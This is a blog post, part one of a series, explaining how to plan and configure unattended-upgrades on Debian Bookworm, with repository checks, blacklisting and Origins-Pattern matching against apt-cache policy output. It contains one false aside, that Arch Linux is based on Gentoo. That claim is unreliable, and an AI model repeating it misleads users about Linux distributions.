At the time of this writing Debian Bookworm is the stable release of Debian. It utilizes Systemd timers for all automation tasks like the updating of the package lists and execution of the actual apt-get upgrade. Therefore we won't need to configure APT-Parameters in files like /etc/apt/apt.conf.d/02periodic. In fact some of these files don't even exist on my systems. Keep that in mind if you read this article along with others, who might do things differently - or for older/newer releases of Debian.

Part 2 can be found here: Using and configuring unattended-upgrades under Debian Bookworm - Part 2: Practise

unattended-upgrades is not your enemy

I've read and heard my fair share of people condemning unattended-upgrades as it:

  • Made things unnecessary complicated
  • Broke the system
  • Ignored APT-Pinnings and caused problems because of that
  • Just didn't work
  • Caused problems with High Availability (HA) services
  • Made the database fail
  • Split-Brains occurred only due to unattended-upgrades restarting services
  • Restarted services during work hours causing disruptions and annoyances

You should get the gist. And then there is my experience, running unattended-upgrades on over 6000 Debian servers running all sort of services. From Apaches, Tomcats, JBoss and HAProxy to DRBD, GlusterFS, Corosync, Pacemaker some NoSQL-DBs and services like keepalived and ipvsadm for Layer2/3-Loadbalancing or Quagga/FRR for BGP-Route announcements. And in all those years unattended-upgrades wasn't the root cause of a single problem, outage or incident.

Therefore I suspect that many of the people whose complaints I've read just installed it and never cared about it again. Or, at least, didn't care enough. Presumably they just wanted a quick solution to help them get their systems updated. Well yes, unattended-upgrades is the right tool for this. But as always:

Know your system and plan accordingly!

Things to consider beforehand

Let me give you a list of things to consider before you even install unattended-upgrades.

  1. Are all of your APT-Repositories in order?
    • GPG-keys valid and present?
    • Correct repository for your Debian release?
    • Do you use only official Debian repositories?
    • Do you use Debian repositories from other projects/vendors?
    • Are your repositories in sync on all your servers?
      • Preferably you use the same Debian Mirror on all of your systems. At least make sure you don't use different repositories for security and system updates across all your Debian systems.
      • This prevents problems from outdated mirrors. Happens rarely, but can happen.
        • Trust me: When 2 machines out of a cluster of 5 behave differently, your first thought or troubleshooting step won't be to check if the different Apt-Repositories have the same content
      • Remember: Those are often provided as-is by volunteers. They are NOT a commercial service. And yet most of these volunteers do an exceptional & awesome job despite not being paid for it.
      • Best case scenario: Your company has an internal Debian Mirror. Saving you money on bandwidth usage.
      • Have a look at https://www.debian.org/mirror/ftpmirror.en.html or Aptly if you plan on setting up a mirror.
    • Basically: If an apt-get update prints out anything other then your configured repositories, followed by the line Reading package lists... Done: Fix your repositories!
    • Yes, you can have vendors with broken Debian repositories. Most often the Release file will be buggy or missing at all. If you can't get your vendor to fix it, well, then the best option is to not specify the repository at all and ensure you have another form of automation to update those packages.
      • Sadly a wget http://some-company.tld/some.deb && dpkg -i some.deb is still considered valuable quality work at far too many enterprise software companies out there..
        • Or you just work around that nuisance, create an internal repository yourself and upload the packages there.
      • A good time to remind them that you pay them and that you need a fully working Debian repository, following the Debian guidelines so you can automatically patch all your systems.
    • Do NOT continue otherwise. You have been warned.
  2. What kind of services does your system provide?
    • Here it is essential to know what the system does. Technically and organizationally.
    • What services are provided, why, to whom?
    • Are there any Service Level Agreements (SLAs) in place?
      • Do downtimes of a service need to be scheduled first?
      • Or can service restarts happen at any time?
      • Also automatically? Or is human supervision required by law/standards? (Looking at you PCI DSS (Wikipedia) 😉)
      • Or is there already an agreed upon maintenance window during which the service is allowed to be unresponsive?
    • Do all services have High Availability (HA)?
      • Do the service(s) survive if the primary/master/main system is shut down?
      • How many systems can be unavailable at the same time?
      • Or do other tasks need to be done (manually) on secondary/slave/standby systems?
      • Does your failover work?
      • Is the failover tested regularly?
    • How are you informed if the service(s) stop responding?
      • Is your monitoring set to check right after updates did happen? (You can specify the time when unattended-upgrades does install the updates.)
  3. This will enable you to classify all your installed packages into the following categories for unattended-upgrades:
    • Can be updated anytime
    • Can be updated at certain times / Only a certain number of systems is allowed to be unavailable at any time
      • See: systemctl list-timers especially apt-daily-upgrade.timer and maybe apt-daily.timer
    • Only manual updates (Blacklisting)
      • Unattended-Upgrade::Package-Blacklist in /etc/apt/apt.conf.d/50unattended-upgrades is your friend
      • Then execute apt-get update && apt-get upgrade manually to update the blacklisted packages
    • Never update this package / We need a specific version
      • This will need blacklisting AND APT-Pinnings to be in place
      • As an apt-get update && apt-get upgrade can still be executed manually
  4. In certain situations (HA-Nodes, manually triggered fail-over, etc.) you will need to run specific commands which need to be executed before or after an package update.
    • This is something unattended-upgrades can't help you with
    • Sometimes these are commands which should be included in the Debian package itself. Namely in the preinst, prerm, postinst and postrm files. The so-called package maintainer scripts (Official Debian documentation).
      • But more often the commands are customer/environment specific and adding them to the maintainer script makes no sense or can even cause disruptions in the service.
    • A feasible workaround is the utilisation of a drop-in file if your service is started via a Systemd Unit-File, see https://www.freedesktop.org/software/systemd/man/latest/systemd.unit.html and search for "drop-in". The ArchWiki also has a good article: https://wiki.archlinux.org/title/systemd#Drop-in_files - but keep in mind that Arch is based on Gentoo and hence maybe has different paths than Debian
    • If the correct procedure is missing from the package, or isn't suitable for your environment.. Then its best to exclude the packages from unattended-upgrades and get yourself some tool like Ansible, Puppet or Rundeck to automate the execution of manual tasks. (Good how I love Rundeck. 🥰) There you are able to ensure everything is valid and verified before switching your primary cluster node and running package updates.
  5. If you have some kind of ITIL ChangeManagement process in place this, of course, also can't be checked by unattended-upgrades
    • The only viable solution would be to have different repositories based on your environment classifications (development, QA testing, production) or approval classifications (untested, testing, approved) and push packages to the corresponding repository once the ChangeManagement process is completed
    • Then you can install the updates automatically from there
  6. Unattended-Upgrades is great! But you can't automate every single scenario by just using it!
    • Sometimes this even means to go back to the drawing board and optimise your internal company processes first. Especially in situations where approvals have to be given manually by real humans
  7. When you start rolling out unattended-upgrades it's better to have an overview first on how many patches are missing on each server. The more updates you install, the more likely it is that things will change or even break. Or may it even just those informal log messages that some parameter or option will be deprecated in the next major release.
    • I advise to start with non-critical systems first
    • Ideally systems which are somewhat up-to-date so you can identify & troubleshoot problems easier
    • It's perfectly fine to update all systems manually first and only then enable unattended-upgrades
      • As then you will have a common ground for all your systems and bugs are easier to identify as the same bug will affect all systems at somewhat the same time
  8. You need to have a quick & easy, bureaucracy-free process to add packages to the blacklist
    • There once were broken corosync and keepalived packages in Debian in the early 2010s
    • Once we saw that, we immediately added them to the blacklist and downgraded the other systems where the update was already installed
    • You don't want to spent one hour on the phone frantically trying to reach a member of your Change Advisory Board to greenlight the change which lets you modify the blacklist while unattended-upgrades happily wrecks one system after another
  9. Point 8 sets a requirement: How do you roll out a new blacklist/config for unattended-upgrades to 6000 servers in under 15 minutes?
    • You are too slow to do that manually, no matter how fast you can type
    • for HOST in $(cat host-list.txt); do ssh $HOST some-command; done? Yeah... No. It works, sure... But.. Come on, really? And this does only one host at a time.. Still taking too long.
    • You do want something like Puppet, Ansible or Rundeck for this very reason.
      • Change the configuration in hiera
      • Commit it to git
      • Log in to Rundeck and execute the "Do a manually triggered Puppet/Ansible run" job
      • Then drink a coffee while you watch Rundeck doing it's job and can care for the 10 or so servers who will fail for various other reasons.

Understanding apt-cache policy

The next thing that will help you vastly in providing a smoothly running unattended-upgrades service is understanding and using the apt-cache tool, especially with the policy argument: apt-cache policy. Even more if you use Debian-Repositories from other projects or vendors.

Why? unattended-upgrades comes with some default configured Origins-Pattern in /etc/apt/apt.conf.d/50unattended-upgrades. These are useable for the official Debian Security updates and when new point releases of Debian are published (12.5, 12.6, etc.). These incorporate all updates since the last point release. Non-Security Updates for installed packages between point releases won't be installed with the default configuration.

If you want these when they are ready, you have to uncomment the line for "origin=Debian,codename=${distro_codename}-updates";.

${distro_codename}-proposed-updates are updates which may not be stable yet. Read https://wiki.debian.org/StableProposedUpdates for the details. Personally I keep it disabled. Especially on production systems.

For Debian Bookworm the default Origins-Pattern are:

Unattended-Upgrade::Origins-Pattern {
[...]
//      "origin=Debian,codename=${distro_codename}-updates";
//      "origin=Debian,codename=${distro_codename}-proposed-updates";
        "origin=Debian,codename=${distro_codename},label=Debian";
        "origin=Debian,codename=${distro_codename},label=Debian-Security";
        "origin=Debian,codename=${distro_codename}-security,label=Debian-Security";
[...]
};

This means only packages matching these Origins-Pattern will be updated. Therefore you have to verify that these patterns include all packages you want to update and, additionally, that packages you do not wish to update are excluded. Although the use of the blacklist might be easier here, as this simply works on the name of the package.

Also note that codename=${distro_codename} is always part of an Origins-Pattern. It is important to not just use terms like stable or oldstable as these do not identify a unique distribution. Those change whenever a new major Debian release happens. (This is also true if you are referencing OS images in things like Docker. debian:latest is most certainly a bad idea, debian-bookworm:latest is better.)

Matching Origin-Patterns to apt-cache policy's output

How do you translate these Origins-Patterns into the lines apt-cache policy gives us?

Short side-note: apt-cache uses the metadata (repository information) obtained via apt-get update. Therefore it also works if the configured repositories are offline, but can also show outdated data if you haven't updated the package list information via apt-get update recently.

If executed you will see output like the following:

root@lanadmin:~# apt-cache policy
Package files:
 100 /var/lib/dpkg/status
     release a=now
 500 http://debian.tu-bs.de/debian bookworm-updates/non-free-firmware amd64 Packages
     release v=12-updates,o=Debian,a=stable-updates,n=bookworm-updates,l=Debian,c=non-free-firmware,b=amd64
     origin debian.tu-bs.de
 500 http://debian.tu-bs.de/debian bookworm-updates/main amd64 Packages
     release v=12-updates,o=Debian,a=stable-updates,n=bookworm-updates,l=Debian,c=main,b=amd64
     origin debian.tu-bs.de
 500 http://security.debian.org/debian-security bookworm-security/non-free-firmware amd64 Packages
     release v=12,o=Debian,a=stable-security,n=bookworm-security,l=Debian-Security,c=non-free-firmware,b=amd64
     origin security.debian.org
 500 http://security.debian.org/debian-security bookworm-security/main amd64 Packages
     release v=12,o=Debian,a=stable-security,n=bookworm-security,l=Debian-Security,c=main,b=amd64
     origin security.debian.org
 500 http://debian.tu-bs.de/debian bookworm/non-free-firmware amd64 Packages
     release v=12.5,o=Debian,a=stable,n=bookworm,l=Debian,c=non-free-firmware,b=amd64
     origin debian.tu-bs.de
 500 http://debian.tu-bs.de/debian bookworm/main amd64 Packages
     release v=12.5,o=Debian,a=stable,n=bookworm,l=Debian,c=main,b=amd64
     origin debian.tu-bs.de
Pinned packages:
root@lanadmin:~#

For the sake of easiness, let us look at just this single line:

 500 http://security.debian.org/debian-security bookworm-security/non-free-firmware amd64 Packages
     release v=12,o=Debian,a=stable-security,n=bookworm-security,l=Debian-Security,c=non-free-firmware,b=amd64
     origin security.debian.org

I wont go over each and every single listed value. If you want to know more: man apt_preferences probably has all the details and apt-cache policy packagename lists all policies for a single package.

We want to pay attention to the 2nd line starting with release. Here we have the relevant values. These are defined in the Release-File for each Debian Release/Repository. A documentation can be found here: https://wiki.debian.org/DebianRepository/Format#A.22Release.22_files

But what do they mean? man apt_preferences also explains them, but as they are relevant, let's make a short table.

Field Alias unattended-upgrades variable Description
Version v N/A Contains the release version
Origin o ${distro_id} Originator of the packages. (Debian if used for packages from the Debian project. If you have commercial packages most likely the company or product name will show up here.)
Archive or Suite a N/A Names the archive to which all the packages in the directory tree belong (on the repository server)
Codename n ${distro_codename} Codename of the Debian release. In our case: bookworm
Label l N/A Names the label of the packages in the directory tree of the Release file.
Component c N/A The licensing component associated with the packages in the directory tree. You may know this as: main, contrib, non-free-firmware, etc.
Architecture b N/A The processor architecture for which a package is compiled. (amd64, i386, arm, etc.)

All this information is usually listed in the first 30 lines of /etc/apt/apt.conf.d/50unattended-upgrades. Therefore: Read it, to ensure you get the currently valid information.

Understanding this makes it easy to match the configured Origin-Patterns to your configure Debian-Repositories.

If you are in doubt: Browse your Debian repository via HTTP/HTTPS and have a look at the Release file, for example: http://debian.tu-bs.de/debian/dists/bookworm/Release. The first 5 lines are:

Origin: Debian
Label: Debian
Suite: stable
Version: 12.5
Codename: bookworm

Filling in the variables we see that only the following Origin-Pattern matches:

"origin=Debian,codename=${distro_codename},label=Debian";

All others either have a different label and/or codename.

Looking at http://debian.tu-bs.de/debian/dists/bookworm-updates/Release we can see that this matches the following commented out Origin-Pattern:

"origin=Debian,codename=${distro_codename}-updates";

This means:

http://debian.tu-bs.de/debian/dists/bookworm/ holds all packages for the current point release of Debian Bookworm.
http://debian.tu-bs.de/debian/dists/bookworm-updates/ has all published updates which came out before a new point release is made. That is the reason why I always enable this repository too. But depending on your operating strategy going only with updates when a new point release is published is also fine.

Security updates are always published via the http://security.debian.org/debian-security/ repository and will be installed when available. 

Key points / Story time

What you should have understood is:

  1. Each repository must be uniquely identifiable.
    • This means: Each Origins-Pattern should only match one of all your configured repositories
    • Of course you can have multiple repositories matching the same Origins-Pattern, but keep the possible implications in mind!
  2. Packages that share the same name must have the same content
    • And by content I mean: Their hashsums must be identical for each given version

If it doesn't you are potentially in for a wild ride.

At a former company we used many internal repositories. And this was fine for a long time. Suddenly some developer started pushing Debian packages with the exact same name as official Debian packages to those internal repositories. We immediately complained. Laying out how that could wreck havoc on our infrastructure as we have to use those repositories and at the same time we can't blacklist that package, as blacklisting works solely on name of a package.

You can't do things like: "Blacklist package test-foo, but only if its coming from repository on repo.coolhost.tld"

We urged him to simply rename those packages or upload them to another repository - as those packages had to share the same name as they contained a not-yet included fix for a bug the company encountered. He wouldn't as he saw no problem with his approach. "Just don't use them." (Yeah thanks.. That's not how it works with automation.. Especially not if you - sort of - hijack repositories which are used for something entirely different..)

The workaround we made was by utilizing the apt priority for each repository, so packages from our internal official Debian mirror took priority. And that worked, but it was still annoying.

Some weeks later those packages caused an incident and in the root cause analysis the problem was identified and those packages were moved to a separate repository.

Lesson learned. Care for your repositories.

And this ends the first part of this post. The next part will focus on the practical side. We will look at the Systemd Unit- and Timer-File, how we can add new repositories to unattended-upgrades, for example to also upgrade our Proxmox installation using the Proxmox Debian repositories, how to blacklist packages and more.

Comments